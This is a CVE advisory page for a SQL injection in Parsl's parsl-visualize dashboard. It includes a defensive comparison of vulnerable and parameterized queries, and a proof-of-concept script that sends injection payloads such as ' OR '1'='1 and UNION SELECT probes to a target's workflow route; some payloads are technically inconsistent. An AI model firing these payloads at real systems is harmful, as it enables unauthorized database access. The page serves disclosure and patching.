Security Vulnerability Report
CVE-2026-21892 CVSS 5.3 MEDIUM

CVE-2026-21892

Published: 2026-01-08 14:15:58
Last Modified: 2026-01-20 18:28:39

Description

Parsl is a Python parallel scripting library. A SQL Injection vulnerability exists in the parsl-visualize component of versions prior to 2026.01.05. The application constructs SQL queries using unsafe string formatting (Python % operator) with user-supplied input (workflow_id) directly from URL routes. This allows an unauthenticated attacker with access to the visualization dashboard to inject arbitrary SQL commands, potentially leading to data exfiltration or denial of service against the monitoring database. Version 2026.01.05 fixes the issue.
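As an added illustration that is not Parsl's own code: the query pattern the advisory describes (a route parameter spliced into SQL with Python's % operator) beside the parameterized form, run against a constructed in-memory SQLite table so the difference in behaviour is visible. The table name, column names, the `get_workflow_*` functions and the run-id allow-list are assumptions, not taken from parsl-visualize.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the monitoring database; the schema is an
    # assumption, not the real parsl-visualize schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE workflow (run_id TEXT, workflow_name TEXT, owner TEXT)")
    db.executemany(
        "INSERT INTO workflow VALUES (?, ?, ?)",
        [("wf-1", "etl-nightly", "alice"), ("wf-2", "sim-batch", "bob")],
    )
    return db


def get_workflow_vulnerable(db, workflow_id):
    # Pattern the advisory describes: the route parameter is formatted into
    # the SQL text, so quote characters in it change the query structure.
    query = "SELECT run_id, workflow_name FROM workflow WHERE run_id='%s'" % workflow_id
    return db.execute(query).fetchall()


def get_workflow_fixed(db, workflow_id):
    # Parameterized query: the driver binds workflow_id as a value, so it can
    # only ever be compared literally against run_id.
    query = "SELECT run_id, workflow_name FROM workflow WHERE run_id=?"
    return db.execute(query, (workflow_id,)).fetchall()


def looks_like_injection(workflow_id):
    # Defence-in-depth check a dashboard can apply before touching the DB.
    # Assumption: legitimate run ids are short [A-Za-z0-9_-] tokens.
    return re.fullmatch(r"[A-Za-z0-9_-]{1,64}", workflow_id) is None


if __name__ == "__main__":
    db = make_db()
    benign = "wf-1"
    tainted = "' OR '1'='1"  # payload quoted in this report's PoC section
    print(get_workflow_vulnerable(db, benign))   # one row
    print(get_workflow_vulnerable(db, tainted))  # every row: WHERE is always true
    print(get_workflow_fixed(db, tainted))       # no rows: treated as a literal
    print(looks_like_injection(tainted))         # True
```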

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:uchicago:parsl:*:*:*:*:*:python:*:* - VULNERABLE
Parsl < 2026.01.05 (parsl-visualize component)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import urllib3

urllib3.disable_warnings()

# CVE-2026-21892 SQL Injection PoC for Parsl parsl-visualize
# Target: Parsl parsl-visualize component < 2026.01.05
target = "http://target-server:5000"

# Basic SQL injection test - extract database version
payloads = [
    "' OR '1'='1",
    "' UNION SELECT NULL,version(),NULL-- ",
    "' UNION SELECT NULL,user(),NULL FROM sqlite_master-- ",
    "1' AND 1=1-- ",
    "1' AND 1=2-- ",
]


def test_sql_injection(target_url, workflow_id):
    """Test SQL injection with given workflow_id"""
    url = f"{target_url}/workflow/{workflow_id}"
    try:
        response = requests.get(url, timeout=10)
        # "success" here only means the server did not return a 500;
        # it is a coarse heuristic, not confirmation of injection.
        return {
            "payload": workflow_id,
            "status_code": response.status_code,
            "response_length": len(response.text),
            "success": response.status_code != 500,
        }
    except requests.exceptions.RequestException as e:
        return {"payload": workflow_id, "error": str(e)}


# Run PoC
print("Testing CVE-2026-21892 SQL Injection...")
for payload in payloads:
    result = test_sql_injection(target, payload)
    print(f"Payload: {payload}")
    print(f"Result: {result}\n")

References

https://github.com/Parsl/parsl/commit/013a928461e70f38a33258bd525a351ed828e974 (Patch)
https://github.com/Parsl/parsl/security/advisories/GHSA-f2mf-q878-gh58 (Exploit, Vendor Advisory)

Record Details (from the raw NVD JSON)

Vulnerability Status: Analyzed
Weakness: CWE-89
CVSS v3.1 (Secondary): 5.3 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L (exploitability 3.9, impact 1.4)
CVSS v3.1 (Primary): 7.3 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L (exploitability 3.9, impact 3.4)
Affected: cpe:2.3:a:uchicago:parsl:*:*:*:*:*:python:*:*, all versions before 2026.01.05 (versionEndExcluding)